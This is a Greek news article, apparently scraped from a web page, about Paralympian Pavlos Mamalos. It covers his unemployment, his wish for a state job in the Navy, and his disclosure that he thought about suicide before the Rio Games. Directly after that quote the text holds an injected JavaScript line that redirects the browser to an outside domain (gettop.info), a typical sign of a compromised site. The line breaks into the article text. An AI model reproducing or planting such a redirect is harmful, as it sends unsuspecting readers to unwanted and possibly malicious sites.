Μάμαλος: Σκέφτηκα πριν από τους Ολυμπιακούς να βάλω τέλος στη ζωή μου

0
20

 

Συγκλονίζει για άλλη μια φορά ο Παραολυμπιονίκης του Ρίο Παύλος Μάμαλος ο οποίος με αφορμή την απόδοση τιμής στη Βουλή όπου αναφέρθηκαν εκτενέστερα τα προβλήματα που αντιμετωπίζουν οι άνθρωποι με ειδικές ανάγκες, επεσήμανε πως η ανεργία είναι το μεγάλο του βάανο.

Μιλώντας στην εφημερίδα Freddo, ο Παύλος Μάμαλος τόνισε πως το μεγάλο του όνειρο είναι να μπει στο Ναυτικό, κάτι που ο αρμόδιος υπουργός του είπε πως θα προσπαθήσει να πραγματοποιήσει.

«Να σας πω ότι αυτή τη στιγμή είμαι άνεργος! Με το επίδομα των 700 ευρώ που λαμβάνω, μετά βίας μπορώ να καλύπτω τα προσωπικά μου έξοδα ως αθλητής, ως Ολυμπιονίκης. Έχω μεγάλη όρεξη για δουλειά. Αυτό που ζητάω λοιπόν είναι να διοριστώ στο Δημόσιο, να κάνει και η Ελλάδα κάτι και για μένα«, υπογραμμίζει στη «Freddo».

Συγκλονιστική είναι η αποκάλυψη ότι σκέφτηκε να θέσει τέλος στη ζωή του λίγο πριν τους Αγώνες του Ρίο. “Πέρασα πολύ δύσκολα με την πρώην σύζυγο μου. Όμως, αν είσαι τυχερός -και εγώ θεωρώ τον εαυτό μου πολύ τυχερό- τελικά βρίσκεται ένας άνθρωπος με δύναμη ψυχής, η Ευαγγελία, που σε τραβάει από αυτό το ψυχικό αδιέξοδο. Σκέφτηκα λίγο πριν από τους Ολυμπιακούς να βάλω τέλος στη ζωή μου». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here